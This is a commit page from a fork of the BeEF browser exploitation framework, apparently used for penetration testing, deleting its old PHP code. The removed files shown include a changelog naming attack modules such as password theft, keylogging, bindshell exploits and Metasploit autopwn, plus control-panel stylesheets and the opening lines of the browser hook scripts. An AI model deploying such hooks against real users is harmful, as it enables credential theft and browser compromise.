Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Moving the PHP trunk to /branches/PHPBeEF/

Browse Source 
git-svn-id: https://beef.googlecode.com/svn/trunk@502 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
This commit is contained in:
scotty.b.brown
2010-11-11 09:13:03 +00:00
parent eb184fa943
commit 8d073f8738
204 changed files with 0 additions and 18946 deletions
Download Patch File Download Diff File Expand all files Collapse all files

133
CHANGELOG
View File

@@ -1,133 +0,0 @@
Version 0.4.0.3
All '<?' changed to '<?php'
Version 0.4.0.2
Firefox password manager theft added
Version 0.4.0.1
Example (example.php) hardcoded path bug fixed
Version 0.4.0.0
Minor Aesthetic Updates
Version 0.3.3.8
Metasploit redirect delay increased
URL filter bug fixed
Module nsl_process_xpcom updated
Version 0.3.3.7
Menu items updated
Network Modules menu added
Inter-protocol Module menu combined with Network Modules menu
Filtering increased
Version 0.3.3.6
XML RPC support added (/include/xmlrpc.inc.php)
Integration with Metasploit added
MSF Browser Exploit module added
MSF SMB challange capture added
Another Autopwn module added (this one using XML RPC)
Version 0.3.3.5
Module torenabled added
Logs moved to cache directory
Verison 0.3.3.4
UXL support added to beefmagic.js.php
Version 0.3.3.3
Module internal ip added
Module internal hostname added
Module nsl_process_xpcom added
Autorun changed to post
Delay (2 second) added to autorun
beefmagic.js.php updated for firefox chrome zone support
Version 0.3.3.2
example.html changed to example.php
Malicious java applet module added
Module code/data sent in post
Visit module additional urls added
malicious_msf_applet added
StripSlashes removed from send_code()
Module smbenum added
Version 0.3.3.1
vmdetect module updated to use Java
vtiger upload exploit module added
browser dos fun module added
msf auto pwn module added
Base64 bug in send_cmds fixed
Ajax.Updater bug work-around in zombie send_code()
Version 0.3.3
Logging functionality added
URL append / bug fix
xss-example.htm renamed to example.htm
Menu item for 'Spawn Zombie Window' added
Menu items for log management added
Zombie html content hidden by default
Zombie html content unsafe viewing added
Zombie html content display slash removal
Modules can now be set as autorun and send code
Autorun modules can now return results
index.php deleted from the hook directory
CSS added for Safari and IE8
Log panel added to main view
Prompt modules added
Redirect modules added
Statusbar module added
Prompt module added
Chrome detected as zombie
Version 0.3.2.2
CVE-2009-0075 autorun module added (IE XP SP2 bindshell)
Version 0.3.2.1.1
This changelog file added
Version 0.3.2.1
Zombie results now append rather than over write
Safari cache work around added
Autorun JS with useragent regexp added
Flash enabled module added
Java enabled module added
CVE-2009-0075 module added (IE XP SP2 bindshell)
CVE-2009-0137 module added (Safari File Snatching)
mob018 module moved to CVE-2009-3730 for consistency
Version 0.3.1.6
Inter-Protocol Communication Module Example
Inter-Protocol Exploition Module Example
Browser Exploit Module Example
Minor Updates
Version 0.3.1.5
CSS Bug Fix
Version 0.3.1.4
BeEF Module Bug Fix
PHP4 Bug Fix
Version 0.3.1.3
Installation Bug Fix
Version 0.3.1.2
Installation Functionality added
PHP 4 bug fix
Version 0.3.1.1
Added w3c compliance
Debug console bug fixed
Version 0.3.1
UI Changes
Zombie specifics added: key logger, content and browser details
Autorun Modules added
Distributed Module Support Added: distributed port scanner
Fine grain control over which zombie a module will send code (sidebar zombies).
Version 0.2.1
PHP 4 bugs fixed

4
INSTALL
View File

@@ -1,4 +0,0 @@
Browse to <site>/beef/ and follow the instructions
Don't forget to chown the beef directory and its contents

1
VERSION
View File

@@ -1 +0,0 @@
0.4.0.3

120
css/firefox/menu.css
View File

@@ -1,120 +0,0 @@
div.menu {
padding: 0px;
padding-bottom: 6px;
margin: 0px;
width: 100%;
height: 1.5em;
position: relative;
font-size: 150%;
font-weight: bold;
z-index: 1;
border : 1px solid #cccccc;
background-color: transparent;
margin-bottom: 0px;
text-align: right;
}
div.menu ul {
padding: 0px;
margin: 0px;
list-style-type: none;
font-size: inherit;
border: 0px;
margin-top: 2px;
}
div.menu li {
float: left;
padding-right: 0px;
position: relative;
z-index: 11;
margin-left: 10px;
}
div.menu ul ul {
visibility: hidden;
position: absolute;
height: 0px;
top: 1.5em; /* must be <= div.menu>a height */
}
div.menu ul li a {
border: 1px solid #ffffff;
text-align: left;
}
div.menu ul ul a:visited {
height: auto;
min-width: 16em; /* dropdown width*/
background-color: #ffffff;
}
div.menu a {
padding: 0px;
padding-left: 3px;
padding-right: 4px;
display: block;
min-height: 1.5em;
line-height: 1.4em;
z-index: 11;
text-decoration: none;
background: #ffffff;
background-color: transparent;
}
div.menu a:visited {
padding: 0px;
padding-left: 3px;
display: block;
min-width: 1.5em; /* changes width */
min-height: 1.5em;
line-height: 1.4em;
z-index: 11;
text-decoration:none;
}
div.menu a:focus {
padding: 0px;
padding-left: 3px;
display: block;
min-width: 11.5em;
min-height: 1.5em;
line-height: 1.4em;
z-index: 11;
text-decoration: none;
}
div.menu a:hover {
min-width: 16em;
}
div.menu ul li a:hover {
background: #cccccc;
min-width: 1em;
border: 1px solid #ffffff;
}
div.menu ul li a:visited {
min-width: 1em;
border: 1px solid #ffffff;
}
div.menu ul li ul a:hover {
background: #cccccc;
min-width: 16em;
}
div.menu ul li ul {
background: #cccccc;
min-width: 16em;
}
div.menu ul li:hover ul, div.menu ul a:hover ul {
visibility: visible;
width: 16em;
}
div.menu div a:hover {
background: #ffffff;
}
div.menu ul li ul li{ /* zombies menu */
border: 0.5px solid #cccccc;
margin-left: 0px;
width: 17em;
background-color: #ffffff;
}
div.menu ul li ul{
width: 16em;
}

461
css/firefox/style.css
View File

@@ -1,461 +0,0 @@
/* BODY */
body {
background-color: white;
width: 990px;
margin-top: 10px;
margin-bottom: 10px;
margin-right: 10px;
color: #333;
font-family: Lucida Grande, Bitstream Vera Sans, Verdana, sans-serif;
}
#autorun_dyn {
text-align: center
}
/* MAIN */
#main {
position: static;
width: 534px;
padding-left: 178px;
margin-right: 0px;
padding-right: 0px;
margin-top: 0px;
}
#bottom {
position: relative;
margin-top: 0px;
}
/* PAGE HEADER */
#pageheader {
margin-top: 0px;
padding: 0px;
padding-bottom: 5px;
font-size: 45%;
}
#pageheader a {
text-decoration: none;
color: #000000;
}
/* BUTTONS */
#page .button {
width: 8em;
background: #FFFFFF;
}
#sidebar .button {
width: 100%;
background: #FFFFFF;
padding: 0;
margin: 1px;
}
/* LOG SIDEBAR */
#logsidebar {
position: absolute;
left: 728px;
width: 250px;
margin: 0px;
border: 1px solid #ccc;
margin-right: 5px;
margin-bottom: 10px;
padding: 10px;
padding-top: 0px;
height: 550px;
overflow: hidden;
}
#logsidebar h2 {
font-size: large;
text-align: center;
margin-top: 5px;
margin-bottom: 1px;
padding-top: 2px;
}
#logsidebar a {
color: rgb(204, 204, 204);
display: inline;
font-size: 11px;
height: 0px;
margin-right: 0px;
margin-top: 0px;
padding-bottom: 10px;
padding-left: 0px;
padding-right: 0px;
padding-top: 0px;
text-decoration: none;
width: 0px;
text-align: center
}
#logdyn {
font-size: 11px;
overflow: auto;
height: 490px;
}
#log_header {
margin-bottom: 10px;
}
/* SIDEBAR */
#sidebar {
position: absolute;
width: 150px;
margin: 0px;
border: 1px solid #ccc;
margin-right: 5px;
margin-bottom: 10px;
padding: 10px;
padding-top: 0px;
height: 550px;
overflow: hidden;
}
#sidebar textarea, #sidebar input, #sidebar select {
width: 100%;
margin: 5px 0;
padding: 1px;
border: #CCCCCC 1px solid;
}
#sidebar a:link {
text-decoration: none;
font-size: 75%;
color: #FF0000;
text-align: center
}
#sidebar #content {
background-color: transparent;
font-size: 80%;
}
#sidebar h1 {
font-size: x-large;
text-align: center;
margin-top: 5px;
margin-bottom: 15px;
padding-top: 2px;
}
#sidebar h2 {
font-size: large;
text-align: center;
margin-top: 5px;
margin-bottom: 1px;
padding-top: 2px;
}
/* PAGE */
#section {
margin: 1px;
border: 1px solid #ccc;
padding: 1px;
padding-top: 0px;
}
/* PAGE */
#newpage {
margin: 1px;
border: 1px solid #ccc;
padding: 1px;
padding-top: 0px;
font-size: 80%;
}
#section_title {
margin: 1px;
border: 1px solid #ccc;
padding: 1px;
padding-top: 0px;
}
#section_content {
margin: 1px;
border: 1px solid #ccc;
padding: 1px;
padding-top: 0px;
background-color: #ccc;
}
/* PAGE */
#page {
margin-top: 0px;
margin-right: -2px;
border: 1px solid #ccc;
padding: 10px;
padding-top: 0px;
font-size: 80%;
height: 550px;
overflow: auto;
}
#page textarea, #page input, #page select {
width: 100%;
margin: 5px 0;
padding: 1px;
border: #CCCCCC 1px solid;
}
#page #content {
background-color: transparent;
}/*
#page p {
margin-top: 0;
}
#page h2 {
font-size: large;
text-align: center;
border-bottom: 1px solid #ccc;
padding-bottom: 2px;
}
#page h3 {
text-align: center;
padding-top: 10px;
margin: 0px;
font-size: 100%;
}
/* DYNAMIC ZOMBIE SECTION */
#zombies {
text-align: left;
vertical-align: -30px;
height: 15px;
font-size: 110%;
padding: 0;
margin:0;
padding-top: 0px;
margin-bottom: 2px;
border: 1px solid #ccc;
margin-right: -1px;
margin-left: 1px;
width: 130px;
}
#zombies p {
vertical-align: -10px;
margin:0px;
padding: 0px;
}
#zombies img {
text-align: left;
vertical-align: -1px;
padding: 1px;
margin:0;
padding-top: 0px;
padding-left: 2px;
margin-bottom: 1px;
margin-top: 1px;
margin-left: 1px;
}
/* SELECTED DYNAMIC ZOMBIE SECTION */
#zombiessel {
background-color: #ccc;
text-align: left;
vertical-align: -30px;
height: 15px;
font-size: 110%;
padding: 0;
margin:0;
padding-top: 0px;
margin-bottom: 2px;
border: 1px solid #ccc;
margin-right: -1px;
margin-left: 1px;
}
#zombiessel p {
vertical-align: -10px;
margin:0px;
padding: 0px;
}
#zombiessel img {
text-align: left;
vertical-align: -1px;
padding: 1px;
margin:0;
padding-top: 0px;
padding-left: 2px;
margin-bottom: 1px;
margin-top: 1px;
margin-left: 1px;
}
#zombiesdyn {
text-align: center;
overflow-y: auto;
overflow-x: hidden;
height: 350px;
}
#module_header {
font-size: large;
font-weight: bold;
text-align: left;
padding-top: 10px;
margin: 0px;
}
#module_subsection {
margin-top: 0px;
margin-right: 0px;
border: 1px solid #ccc;
padding: 10px;
padding-left: 5px;
padding-top: 0px;
padding-bottom: 0px;
font-size: 100%;
}
/* BUTTONS */
#module_subsection .button {
width: 8em;
background: #FFFFFF;
}
#module_subsection textarea {
font-family: Lucida Grande, Bitstream Vera Sans, Verdana, sans-serif;
width: 100%;
font-size: 80%;
margin: 5px 0;
padding: 1px;
border: #CCCCCC 1px solid;
}
#module_subsection input, #module_subsection select {
/* font-weight: bold; */
width: 100%;
margin: 5px 0;
padding: 1px;
border: #CCCCCC 1px solid;
}
#module_subsection_header {
font-weight: bold;
margin-top: 0px;
margin-right: 0px;
padding: 0px;
padding-left: 0px;
padding-top: 0px;
/* font-size: 120%; */
/* display: inline; */
}
#zombie_header {
font-size: large;
font-weight: bold;
text-align: left;
padding-top: 10px;
margin: 0px;
}
#zombie_subsection {
/* font-weight: bold; */
margin-top: 0px;
margin-right: 0px;
border: 1px solid #ccc;
padding: 0px;
padding-left: 5px;
padding-top: 0px;
font-size: 100%;
}
#zombie_subsection_header {
font-weight: bold;
margin-top: 0px;
margin-right: 0px;
padding: 0px;
padding-left: 0px;
padding-top: 0px;
/* font-size: 120%; */
display: inline;
}
#zombie_header a {
display: inline;
text-decoration: none;
/* font-weight: none; */
margin-top: 0px;
margin-right: 0px;
padding: 0px;
padding-left: 0px;
padding-top: 0px;
/* color: #FF0000; */
color: #CCCCCC;
font-size: 60%;
}
#zombie_subsection textarea, #zombie_subsection input, #zombie_subsection select {
width: 100%;
margin: 5px 0;
padding: 1px;
border: #CCCCCC 1px solid;
}
#zombie_page_title {
font-weight: bold;
text-align: left;
padding-top: 100px;
margin-top: 100px;
font-size: 180%;
}
/* ZOMBIE TEXT - on buttons*/
#zombietext {
color: black;
font-size: 110%;
padding-top: 10px;
margin-top: -27px;
margin-left: 5px;
}
/* GENERAL CONTENT (HELP, ETC) */
DIV.entry {
margin-bottom: 10px;
}
DIV.entry P {
margin: 0;
}
DIV.entry P.title {
font-size: large;
font-weight: bold;
text-align: left;
padding-top: 10px;
margin: 0px;
}
DIV.entry a {
text-decoration: none;
color: #FF0000;
}
#credits {
float: right;
position: static;
margin-right: 10px;
margin-top: -24px;
font-size: 70%;
text-decoration: none;
color: #FF0000;
font-weight: bold;
z-index: 40;
}
#credits a {
color: #FF0000;
text-decoration: none;
z-index: 40;
}

68
css/ie/menu.css
View File

@@ -1,68 +0,0 @@
/*
* no > selectors are used, 'cause some browsers are too stupid
*/
div.menu {
padding: 3px;
margin: 0px;
width: 99%;
height: 1.5em;
border: 1px solid #cccccc;
position: relative;
font-size: 150%;
font-weight: bold;
background: transparent;
z-index: 1;
}
div.menu ul {
padding: 0px;
margin: 0px;
list-style-type:none;
font-size: inherit;
}
div.menu li {
float: left;
min-width: 1em;
position: relative;
z-index: 11;
}
div.menu ul ul {
visibility: hidden;
min-width: 12em;
position: absolute;
height: 0px;
top: 1.5em; /* must be <= div.menu>a height */
}
div.menu a {
padding: 0px;
padding-left: 3px;
padding-right: 10px;
padding-left: 3px;
display: block;
min-height: 1.5em;
line-height: 1.4em;
z-index: 11;
text-decoration:none;
background: #eeeeee;
}
div.menu a:hover {
background: #cccccc;
}
div.menu ul li a {
background: #FFFFFF;
}
div.menu ul li a:hover {
background: #cccccc;
}
div.menu ul li ul li a:hover {
background: #cccccc;
}
div.menu ul li ul li a {
min-width: 17em;
border: 1px solid #cccccc;
margin-left: 0px;
background: #ffffff;
}
div.menu ul li:hover ul, div.menu ul a:hover ul {
visibility: visible;
}

471
css/ie/style.css
View File

@@ -1,471 +0,0 @@
/* BODY */
body {
background-color: white;
width: 990px;
margin-top: 10px;
margin-bottom: 10px;
margin-right: 10px;
color: #333;
font-family: Lucida Grande, Bitstream Vera Sans, Verdana, sans-serif;
}
#autorun_dyn {
text-align: center
}
/* MAIN */
#main {
position: static;
width: 530px;
padding-left: 178px;
margin-right: 0px;
padding-right: 0px;
margin-top: 0px;
}
#bottom {
position: relative;
margin-top: 0px;
}
/* PAGE HEADER */
#pageheader {
margin-top: 0px;
padding: 0px;
padding-bottom: 5px;
font-size: 45%;
z-index:-1;
}
#pageheader a {
text-decoration: none;
color: #000000;
}
/* BUTTONS */
#page .button {
width: 8em;
background: #FFFFFF;
}
#sidebar .button {
width: 100%;
background: #FFFFFF;
padding: 0;
margin: 1px;
}
/* LOG SIDEBAR */
#logsidebar {
position: absolute;
left: 724px;
width: 250px;
margin: 0px;
border: 1px solid #ccc;
margin-right: 5px;
margin-bottom: 10px;
padding: 10px;
padding-top: 0px;
height: 550px;
}
#logsidebar h2 {
font-size: large;
text-align: center;
margin-top: 0px;
margin-bottom: 0px;
padding-top: 0px;
}
#logsidebar a {
color: rgb(204, 204, 204);
display: inline;
font-size: 9px;
height: 0px;
margin-right: 0px;
margin-top: 0px;
padding-bottom: 10px;
padding-left: 0px;
padding-right: 0px;
padding-top: 0px;
text-decoration: none;
width: 0px;
text-align: center
}
#log_header {
margin-bottom: 10px;
padding-top: 10px;
}
#logdyn {
font-size: 9px;
overflow: auto;
height: 500px;
}
#logsidebar_heading, #logsidebar_heading a {
text-decoration: none;
font-size: 75%;
color: #000000;
text-align: center
}
/* SIDEBAR */
#sidebar {
position: absolute;
width: 150px;
margin: 0px;
border: 1px solid #ccc;
margin-right: 5px;
margin-bottom: 10px;
padding: 10px;
padding-top: 0px;
height: 550px;
overflow: hidden;
}
#sidebar textarea, #sidebar input, #sidebar select {
width: 100%;
margin: 5px 0;
padding: 1px;
border: #CCCCCC 1px solid;
}
#sidebar a:link {
text-decoration: none;
font-size: 75%;
color: #FF0000;
text-align: center
}
#sidebar #content {
background-color: transparent;
font-size: 80%;
}
#sidebar h1 {
font-size: x-large;
text-align: center;
margin-top: 5px;
margin-bottom: 15px;
padding-top: 2px;
}
#sidebar h2 {
font-size: large;
text-align: center;
margin-top: 5px;
margin-bottom: 1px;
padding-top: 2px;
}
/* PAGE */
#section {
margin: 1px;
border: 1px solid #ccc;
padding: 1px;
padding-top: 0px;
}
/* PAGE */
#newpage {
margin: 1px;
border: 1px solid #ccc;
padding: 1px;
padding-top: 0px;
font-size: 80%;
}
#section_title {
margin: 1px;
border: 1px solid #ccc;
padding: 1px;
padding-top: 0px;
}
#section_content {
margin: 1px;
border: 1px solid #ccc;
padding: 1px;
padding-top: 0px;
background-color: #ccc;
}
/* PAGE */
#page {
margin-top: 0px;
margin-right: -2px;
border: 1px solid #ccc;
padding: 10px;
padding-top: 0px;
font-size: 80%;
height: 550px;
overflow: auto;
}
#page textarea, #page input, #page select {
width: 100%;
margin: 5px 0;
padding: 1px;
border: #CCCCCC 1px solid;
}
#page #content {
background-color: transparent;
}/*
#page p {
margin-top: 0;
}
#page h2 {
font-size: large;
text-align: center;
border-bottom: 1px solid #ccc;
padding-bottom: 2px;
}
#page h3 {
text-align: center;
padding-top: 10px;
margin: 0px;
font-size: 100%;
}
/* DYNAMIC ZOMBIE SECTION */
#zombies {
text-align: left;
vertical-align: -30px;
height: 15px;
font-size: 110%;
padding: 0;
margin:0;
padding-top: 0px;
margin-bottom: 2px;
border: 1px solid #ccc;
margin-right: -1px;
margin-left: 1px;
width: 130px;
}
#zombies p {
vertical-align: -10px;
margin:0px;
padding: 0px;
}
#zombies img {
text-align: left;
vertical-align: -1px;
padding: 1px;
margin:0;
padding-top: 0px;
padding-left: 2px;
margin-bottom: 1px;
margin-top: 1px;
margin-left: 1px;
}
/* SELECTED DYNAMIC ZOMBIE SECTION */
#zombiessel {
background-color: #ccc;
text-align: left;
vertical-align: -30px;
height: 15px;
font-size: 110%;
padding: 0;
margin:0;
padding-top: 0px;
margin-bottom: 2px;
border: 1px solid #ccc;
margin-right: -1px;
margin-left: 1px;
}
#zombiessel p {
vertical-align: -10px;
margin:0px;
padding: 0px;
}
#zombiessel img {
text-align: left;
vertical-align: -1px;
padding: 1px;
margin:0;
padding-top: 0px;
padding-left: 2px;
margin-bottom: 1px;
margin-top: 1px;
margin-left: 1px;
}
#zombiesdyn {
text-align: center;
overflow-y: auto;
overflow-x: hidden;
height: 355px;
}
#module_header {
font-size: large;
font-weight: bold;
text-align: left;
padding-top: 10px;
margin: 0px;
}
#module_subsection {
margin-top: 0px;
margin-right: 0px;
border: 1px solid #ccc;
padding: 10px;
padding-left: 5px;
padding-top: 0px;
padding-bottom: 0px;
font-size: 100%;
}
/* BUTTONS */
#module_subsection .button {
width: 8em;
background: #FFFFFF;
}
#module_subsection textarea {
font-family: Lucida Grande, Bitstream Vera Sans, Verdana, sans-serif;
width: 100%;
font-size: 80%;
margin: 5px 0;
padding: 1px;
border: #CCCCCC 1px solid;
}
#module_subsection input, #module_subsection select {
/* font-weight: bold; */
width: 100%;
margin: 5px 0;
padding: 1px;
border: #CCCCCC 1px solid;
}
#module_subsection_header {
font-weight: bold;
margin-top: 0px;
margin-right: 0px;
padding: 0px;
padding-left: 0px;
padding-top: 0px;
/* font-size: 120%; */
/* display: inline; */
}
#zombie_header {
font-size: large;
font-weight: bold;
text-align: left;
padding-top: 10px;
margin: 0px;
}
#zombie_subsection {
/* font-weight: bold; */
margin-top: 0px;
margin-right: 0px;
border: 1px solid #ccc;
padding: 0px;
padding-left: 5px;
padding-top: 0px;
font-size: 100%;
}
#zombie_subsection_header {
font-weight: bold;
margin-top: 0px;
margin-right: 0px;
padding: 0px;
padding-left: 0px;
padding-top: 0px;
/* font-size: 120%; */
display: inline;
}
#zombie_header a {
display: inline;
text-decoration: none;
/* font-weight: none; */
margin-top: 0px;
margin-right: 0px;
padding: 0px;
padding-left: 0px;
padding-top: 0px;
/* color: #FF0000; */
color: #CCCCCC;
font-size: 60%;
}
#zombie_subsection textarea, #zombie_subsection input, #zombie_subsection select {
width: 100%;
margin: 5px 0;
padding: 1px;
border: #CCCCCC 1px solid;
}
#zombie_page_title {
font-weight: bold;
text-align: left;
padding-top: 100px;
margin-top: 100px;
font-size: 180%;
}
/* ZOMBIE TEXT - on buttons*/
#zombietext {
color: black;
font-size: 110%;
padding-top: 10px;
margin-top: -27px;
margin-left: 5px;
}
/* GENERAL CONTENT (HELP, ETC) */
DIV.entry {
margin-bottom: 10px;
}
DIV.entry P {
margin: 0;
}
DIV.entry P.title {
font-size: large;
font-weight: bold;
text-align: left;
padding-top: 10px;
margin: 0px;
}
DIV.entry a {
text-decoration: none;
color: #FF0000;
}
#credits {
float: right;
position: static;
margin-right: 10px;
margin-top: -24px;
font-size: 70%;
text-decoration: none;
color: #FF0000;
font-weight: bold;
z-index: 40;
}
#credits a {
color: #FF0000;
text-decoration: none;
z-index: 40;
}

70
css/safari/menu.css
View File

@@ -1,70 +0,0 @@
/*
* no > selectors are used, 'cause some browsers are too stupid
*/
div.menu {
padding: 3px;
margin: 0px;
width: 99%;
height: 1.5em;
border: 1px solid #cccccc;
position: relative;
font-size: 150%;
font-weight: bold;
background: transparent;
z-index: 1;
}
div.menu ul {
padding: 0px;
margin: 0px;
list-style-type:none;
font-size: inherit;
}
div.menu li {
float: left;
min-width: 1em;
position: relative;
z-index: 11;
background: transparent;
}
div.menu ul ul {
visibility: hidden;
min-width: 12em;
position: absolute;
height: 0px;
top: 1.5em; /* must be <= div.menu>a height */
}
div.menu ul ul a, div.menu ul ul a:visited {
height: auto;
}
div.menu a, div.menu a:visited, div.menu a:focus {
padding: 0px;
padding-left: 3px;
padding-right: 10px;
display: block;
min-height: 1.5em;
line-height: 1.4em;
z-index: 11;
text-decoration:none;
background: white;
}
div.menu a:hover {
background: #cccccc;
}
div.menu ul li a:hover {
background: #cccccc;
}
div.menu ul li a {
background: #FFFFFF;
}
div.menu ul li ul li a {
min-width: 17em;
border: 1px solid #cccccc;
margin-left: 0px;
background: #FFFFFF;
}
div.menu ul li:hover ul, div.menu ul a:hover ul {
visibility: visible;
}

478
css/safari/style.css
View File

@@ -1,478 +0,0 @@
/* BODY */
body {
background-color: white;
width: 990px;
margin-top: 10px;
margin-bottom: 10px;
margin-right: 10px;
color: #333;
font-family: Lucida Grande, Bitstream Vera Sans, Verdana, sans-serif;
align: center;
}
#autorun_dyn {
text-align: center
}
/* MAIN */
#main {
position: static;
width: 530px;
padding-left: 178px;
margin-right: 0px;
padding-right: 0px;
margin-top: 0px;
}
#bottom {
position: relative;
margin-top: 0px;
}
/* PAGE HEADER */
#pageheader {
margin-top: 0px;
padding: 0px;
padding-bottom: 5px;
font-size: 45%;
}
#pageheader a {
text-decoration: none;
color: #000000;
}
/* BUTTONS */
#page .button {
width: 8em;
background: #FFFFFF;
}
#sidebar .button {
width: 100%;
background: #FFFFFF;
padding: 0;
margin: 1px;
}
/* LOG SIDEBAR */
#logsidebar {
position: absolute;
left: 724px;
width: 250px;
margin: 0px;
border: 1px solid #ccc;
margin-right: 5px;
margin-bottom: 10px;
padding: 10px;
padding-top: 0px;
height: 550px;
}
#logsidebar h2 {
font-size: large;
text-align: center;
margin-top: 0px;
margin-bottom: 0px;
padding-top: 0px;
}
#logsidebar a {
color: rgb(204, 204, 204);
display: inline;
font-size: 11px;
height: 0px;
margin-right: 0px;
margin-top: 0px;
padding-bottom: 10px;
padding-left: 0px;
padding-right: 0px;
padding-top: 0px;
text-decoration: none;
width: 0px;
text-align: center
}
#log_header {
margin-bottom: 10px;
padding-top: 10px;
}
#logdyn {
font-size: 9px;
overflow: auto;
height: 500px;
}
#logsidebar_heading, #logsidebar_heading a {
text-decoration: none;
font-size: 75%;
color: #000000;
text-align: center
}
/* SIDEBAR */
#sidebar {
position: absolute;
width: 150px;
margin: 0px;
border: 1px solid #ccc;
margin-right: 5px;
margin-bottom: 10px;
padding: 10px;
padding-top: 0px;
height: 550px;
overflow: hidden;
}
#sidebar textarea, #sidebar input, #sidebar select {
width: 100%;
margin: 5px 0;
padding: 1px;
border: #CCCCCC 1px solid;
}
#sidebar a:link {
text-decoration: none;
font-size: 75%;
color: #FF0000;
text-align: center
}
#beefheading a {
text-decoration: none;
font-size: 75%;
color: #FF0000;
text-align: center
}
#sidebar #content {
background-color: transparent;
font-size: 80%;
}
#sidebar h1 {
font-size: x-large;
text-align: center;
margin-top: 5px;
margin-bottom: 15px;
padding-top: 2px;
}
#sidebar h2 {
font-size: large;
text-align: center;
margin-top: 5px;
margin-bottom: 1px;
padding-top: 2px;
}
/* PAGE */
#section {
margin: 1px;
border: 1px solid #ccc;
padding: 1px;
padding-top: 0px;
}
/* PAGE */
#newpage {
margin: 1px;
border: 1px solid #ccc;
padding: 1px;
padding-top: 0px;
font-size: 80%;
}
#section_title {
margin: 1px;
border: 1px solid #ccc;
padding: 1px;
padding-top: 0px;
}
#section_content {
margin: 1px;
border: 1px solid #ccc;
padding: 1px;
padding-top: 0px;
background-color: #ccc;
}
/* PAGE */
#page {
margin-top: 0px;
margin-right: -2px;
border: 1px solid #ccc;
padding: 10px;
padding-top: 0px;
font-size: 80%;
height: 550px;
overflow: auto;
}
#page textarea, #page input, #page select {
width: 100%;
margin: 5px 0;
padding: 1px;
border: #CCCCCC 1px solid;
}
#page #content {
background-color: transparent;
}/*
#page p {
margin-top: 0;
}
#page h2 {
font-size: large;
text-align: center;
border-bottom: 1px solid #ccc;
padding-bottom: 2px;
}
#page h3 {
text-align: center;
padding-top: 10px;
margin: 0px;
font-size: 100%;
}
/* DYNAMIC ZOMBIE SECTION */
#zombies {
text-align: left;
vertical-align: -30px;
height: 15px;
font-size: 110%;
padding: 0;
margin:0;
padding-top: 0px;
margin-bottom: 2px;
border: 1px solid #ccc;
margin-right: -1px;
margin-left: 1px;
width: 130px;
}
#zombies p {
vertical-align: -10px;
margin:0px;
padding: 0px;
}
#zombies img {
text-align: left;
vertical-align: -1px;
padding: 1px;
margin:0;
padding-top: 0px;
padding-left: 2px;
margin-bottom: 1px;
margin-top: 1px;
margin-left: 1px;
}
/* SELECTED DYNAMIC ZOMBIE SECTION */
#zombiessel {
background-color: #ccc;
text-align: left;
vertical-align: -30px;
height: 15px;
font-size: 110%;
padding: 0;
margin:0;
padding-top: 0px;
margin-bottom: 2px;
border: 1px solid #ccc;
margin-right: -1px;
margin-left: 1px;
}
#zombiessel p {
vertical-align: -10px;
margin:0px;
padding: 0px;
}
#zombiessel img {
text-align: left;
vertical-align: -1px;
padding: 1px;
margin:0;
padding-top: 0px;
padding-left: 2px;
margin-bottom: 1px;
margin-top: 1px;
margin-left: 1px;
}
#zombiesdyn {
text-align: center;
overflow-y: auto;
overflow-x: hidden;
height: 355px;
}
#module_header {
font-size: large;
font-weight: bold;
text-align: left;
padding-top: 10px;
margin: 0px;
}
#module_subsection {
margin-top: 0px;
margin-right: 0px;
border: 1px solid #ccc;
padding: 10px;
padding-left: 5px;
padding-top: 0px;
padding-bottom: 0px;
font-size: 100%;
}
/* BUTTONS */
#module_subsection .button {
width: 8em;
background: #FFFFFF;
}
#module_subsection textarea {
font-family: Lucida Grande, Bitstream Vera Sans, Verdana, sans-serif;
width: 100%;
font-size: 80%;
margin: 5px 0;
padding: 1px;
border: #CCCCCC 1px solid;
}
#module_subsection input, #module_subsection select {
/* font-weight: bold; */
width: 100%;
margin: 5px 0;
padding: 1px;
border: #CCCCCC 1px solid;
}
#module_subsection_header {
font-weight: bold;
margin-top: 0px;
margin-right: 0px;
padding: 0px;
padding-left: 0px;
padding-top: 0px;
/* font-size: 120%; */
/* display: inline; */
}
#zombie_header {
font-size: large;
font-weight: bold;
text-align: left;
padding-top: 10px;
margin: 0px;
}
#zombie_subsection {
/* font-weight: bold; */
margin-top: 0px;
margin-right: 0px;
border: 1px solid #ccc;
padding: 0px;
padding-left: 5px;
padding-top: 0px;
font-size: 100%;
}
#zombie_subsection_header {
font-weight: bold;
margin-top: 0px;
margin-right: 0px;
padding: 0px;
padding-left: 0px;
padding-top: 0px;
/* font-size: 120%; */
display: inline;
}
#zombie_header a {
display: inline;
text-decoration: none;
/* font-weight: none; */
margin-top: 0px;
margin-right: 0px;
padding: 0px;
padding-left: 0px;
padding-top: 0px;
/* color: #FF0000; */
color: #CCCCCC;
font-size: 60%;
}
#zombie_subsection textarea, #zombie_subsection input, #zombie_subsection select {
width: 100%;
margin: 5px 0;
padding: 1px;
border: #CCCCCC 1px solid;
}
#zombie_page_title {
font-weight: bold;
text-align: left;
padding-top: 100px;
margin-top: 100px;
font-size: 180%;
}
/* ZOMBIE TEXT - on buttons*/
#zombietext {
color: black;
font-size: 110%;
padding-top: 10px;
margin-top: -27px;
margin-left: 5px;
}
/* GENERAL CONTENT (HELP, ETC) */
DIV.entry {
margin-bottom: 10px;
}
DIV.entry P {
margin: 0;
}
DIV.entry P.title {
font-size: large;
font-weight: bold;
text-align: left;
padding-top: 10px;
margin: 0px;
}
DIV.entry a {
text-decoration: none;
color: #FF0000;
}
#credits {
float: right;
position: static;
margin-right: 10px;
margin-top: -24px;
font-size: 70%;
text-decoration: none;
color: #FF0000;
font-weight: bold;
z-index: 40;
}
#credits a {
color: #FF0000;
text-decoration: none;
z-index: 40;
}

22
hook/autorun.js.php
View File

@@ -1,22 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../include/globals.inc.php");
require_once("../include/common.inc.php");
session_name(SESSION_NAME);
session_start();
// location of auto run file
$autorun_file = AUTORUN_TMP_DIR . AUTORUN_TMP_FILENAME;
// that auto run been set
if(!file_exists($autorun_file)) { return ""; }
// set up the return_id, session and get the code
$code = module_code_and_result_setup($autorun_file);
echo $code;
?>

161
hook/beefmagic.js.php
View File

@@ -1,161 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../include/globals.inc.php");
require_once("../include/common.inc.php");
require_once("../include/hook.inc.php");
header('Content-Type: text/javascript; charset=utf-8');
